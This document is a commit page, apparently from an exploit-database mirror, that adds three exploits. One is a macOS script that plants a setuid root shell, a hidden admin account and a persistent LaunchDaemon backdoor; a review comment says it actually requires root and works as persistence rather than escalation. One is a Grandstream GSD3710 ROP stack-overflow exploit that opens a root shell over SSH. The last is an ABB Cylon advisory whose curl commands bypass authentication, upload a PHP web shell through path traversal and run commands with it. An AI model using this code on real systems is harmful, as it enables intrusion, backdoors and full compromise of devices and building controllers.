
Commit df3766c

author
certcc-ghbot
committed
Merge remote-tracking branch 'upstream/main'
2 parents f6e8a42 + 2825165 commit df3766c


7 files changed

+586
-0
lines changed


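--- a/exploits/macos/local/52316.py
+++ b/exploits/macos/local/52316.py
@@ -0,0 +1,100 @@
+#!/usr/bin/env python3
+# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
+# Author: Mohammed Idrees Banyamer (@banyamer_security)
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-05-31
+# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
+# CVE: CVE-2025-24085
+# Type: Local Privilege Escalation
+# Platform: macOS
+# Author Country: Jordan
+# Description:
+# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
+# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
+# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
+# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
+# on macOS Sonoma systems.
+
+import os
+import plistlib
+import time
+from pathlib import Path
+
+LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
+PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
+
+def create_payload():
+print("[+] Creating root payload script...")
+payload = """#!/bin/bash
+# Root shell
+cp /bin/bash /tmp/.rootbash
+chmod +s /tmp/.rootbash
+chown root:wheel /tmp/.rootbash
+
+# Add admin user
+sysadminctl -addUser pentest -password macOS123! -admin
+
+# Log file
+echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
+
+# Persistent backdoor
+cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
+"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+<key>Label</key><string>com.apple.backdoor</string>
+<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
+<key>RunAtLoad</key><true/>
+</dict>
+</plist>
+EOF
+chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
+chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
+"""
+with open(PAYLOAD_SCRIPT, "w") as f:
+f.write(payload)
+os.chmod(PAYLOAD_SCRIPT, 0o755)
+
+def hijack_launchdaemon():
+print("[+] Hijacking LaunchDaemon plist...")
+if not Path(LAUNCHD_PLIST).exists():
+# create a fake one
+print("[*] Creating fake LaunchDaemon plist for exploitation...")
+plist_data = {
+'Label': 'com.apple.securemonitor',
+'ProgramArguments': [PAYLOAD_SCRIPT],
+'RunAtLoad': True,
+}
+with open(LAUNCHD_PLIST, "wb") as f:
+plistlib.dump(plist_data, f)
+else:
+# hijack existing one
+with open(LAUNCHD_PLIST, 'rb') as f:
+plist = plistlib.load(f)
+plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
+plist['RunAtLoad'] = True
+with open(LAUNCHD_PLIST, 'wb') as f:
+plistlib.dump(plist, f)
+
+os.system(f"chmod 644 {LAUNCHD_PLIST}")
+os.system(f"chown root:wheel {LAUNCHD_PLIST}")
+
+def trigger_payload():
+print("[+] Triggering LaunchDaemon manually...")
+os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
+print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
+
+def main():
+if os.geteuid() == 0:
+print("[!] You are already root. No need to exploit.")
+return
+create_payload()
+hijack_launchdaemon()
+print("[+] Exploit completed. Reboot or run manually:")
+print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
+print(" Then run: /tmp/.rootbash -p")
+
+if __name__ == "__main__":
+main()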
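Review bot: The header calls this a local privilege escalation, but every privileged step in the code presupposes the privileges it claims to obtain: `open(LAUNCHD_PLIST, "wb")` writes under /Library/LaunchDaemons, `os.system(f"chown root:wheel {LAUNCHD_PLIST}")` needs root, and the `sudo launchctl load -w` the user is told to run only prompts the invoking admin for their own password. For a user without write access to /Library/LaunchDaemons, hijack_launchdaemon fails on its first open and nothing else runs, so the file is a root-required persistence installer rather than an exploit, and the `# CVE: CVE-2025-24085` line is not tied to any code path on the page. The header should state this plainly, e.g. `# NOTE: every write below targets /Library/LaunchDaemons and requires root; this script installs persistence, it does not escalate privileges.` For a defender the useful content is the fixed artifact set visible in the payload string (the setuid copy at /tmp/.rootbash, the com.apple.backdoor plist, the added `pentest` admin account and /tmp/.rootlog). As style points, `import time` is unused and `trigger_payload` is defined but never called from main.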

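--- a/exploits/multiple/remote/52313.py
+++ b/exploits/multiple/remote/52313.py
@@ -0,0 +1,110 @@
+#!/usr/bin/env python3
+
+# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
+# Date: 2025-05-29
+# Exploit Author: Pepelux
+# Vendor Homepage: https://www.grandstream.com/
+# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
+# Tested on: Linux and MacOS
+# CVE: CVE-2022-2025
+
+"""
+Author: Jose Luis Verdeguer (@pepeluxx)
+
+Required: Pwntools
+
+Example:
+
+$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
+"""
+
+
+from struct import pack
+import sys
+from time import sleep
+import argparse
+from pwn import *
+
+
+def get_args():
+parser = argparse.ArgumentParser(
+formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
+prog, max_help_position=50))
+
+# Add arguments
+parser.add_argument('-i', '--ip', type=str, required=True,
+help='device IP address', dest="ip")
+parser.add_argument('-u', '--user', type=str, required=True,
+help='username', dest="user")
+parser.add_argument('-p', '--pass', type=str, required=True,
+help='password', dest="pwd")
+
+# Array for all arguments passed to script
+args = parser.parse_args()
+
+try:
+ip = args.ip
+user = args.user
+pwd = args.pwd
+
+return ip, user, pwd
+except ValueError:
+exit()
+
+def check_badchars(payload):
+for i in range(5, len(payload)):
+if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
+log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
+return True
+return False
+
+
+def main():
+ip, user, pwd = get_args()
+
+libc_base = 0x76bb8000
+gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
+bin_sh = libc_base + 0xCEA9C # /bin/sh
+system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
+exit = libc_base + 0x2660C
+
+print("[*] Libc base: %#x" % libc_base)
+print("[*] ROP gadget: %#x" % gadget)
+print("[*] /bin/sh: %#x" % bin_sh)
+print("[*] system: %#x" % system)
+print("[*] exit: %#x\n" % exit)
+
+padding = b"A" * 320
+
+payload = b'ping '
+payload += padding
+payload += p32(gadget)
+payload += p32(bin_sh)
+payload += b"AAAA"
+payload += p32(system)
+payload += p32(exit)
+
+if check_badchars(payload):
+sys.exit(0)
+
+count = 1
+
+while True:
+print('Try: %d' % count)
+s = ssh(user, ip, 22, pwd)
+p = s.shell(tty=False)
+print(p.readuntil(b"GDS3710> "))
+p.sendline(payload)
+p.sendline(b"id")
+sleep(1)
+data = p.read()
+if str(data).find('root') > -1:
+print('PWNED!')
+p.interactive()
+s.close()
+sys.exit()
+s.close()
+count += 1
+
+if __name__ == '__main__':
+main()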
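Review bot: `exit = libc_base + 0x2660C` in main shadows the builtin `exit`, and the `try`/`except ValueError` in get_args wraps three plain attribute reads that cannot raise ValueError, since argparse has already reported bad input and exited before `args.ip` is touched; rename the local to `exit_addr` and reduce get_args to `return args.ip, args.user, args.pwd`. `from struct import pack` is unused because the payload is built with pwntools' `p32`, and the star import `from pwn import *` is what brings `p32`, `ssh` and `log` into scope, which is worth a comment for readers who do not know pwntools. The docstring example `$ python 3 CVE-2022-2025.py` should read `python3`.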

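--- a/exploits/multiple/remote/52317.txt
+++ b/exploits/multiple/remote/52317.txt
@@ -0,0 +1,97 @@
+ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
+
+
+Vendor: ABB Ltd.
+Product web page: https://www.global.abb
+Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+Firmware: <=3.08.04
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
+AuthenticatedHttpServlet within its application server, enabling
+remote attackers to bypass authentication by setting the Host:
+127.0.0.1 header. This deceives the server into processing requests
+as if they originate from localhost, granting unauthorized access
+to privileged operations. This bypass grants access to privileged
+functionality, including the DeploymentServlet, which is vulnerable
+to directory traversal. By leveraging this, an attacker can write
+arbitrary PHP files outside the intended directory scope. When combined,
+these issues allow remote attackers to upload a malicious PHP shell
+and execute system commands with the privileges of the web server,
+leading to full system compromise.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+GNU/Linux 3.10.0 (x86_64)
+GNU/Linux 2.6.32 (x86_64)
+Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+PHP/7.3.11
+PHP/5.6.30
+PHP/5.4.16
+PHP/4.4.8
+PHP/5.3.3
+AspectFT Automation Application Server
+lighttpd/1.4.32
+lighttpd/1.4.18
+Apache/2.2.15 (CentOS)
+OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2025-5954
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+P R O J E C T
+
+.|
+| |
+|'| ._____
+___ | | |. |' .---"|
+_ .-' '-. | | .--'| || | _| |
+.-'| _.| | || '-__ | | | || |
+|' | |. | || | | | | || |
+____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\
+> ?RequestType=DeploySource\
+> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\
+> &directory=/" \
+> --data-binary @zsl.php \
+> -H "Host: 127.0.0.1" \
+> -H "Content-Type: application/octet-stream"
+<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
+
+$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php
+uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0
+-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php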
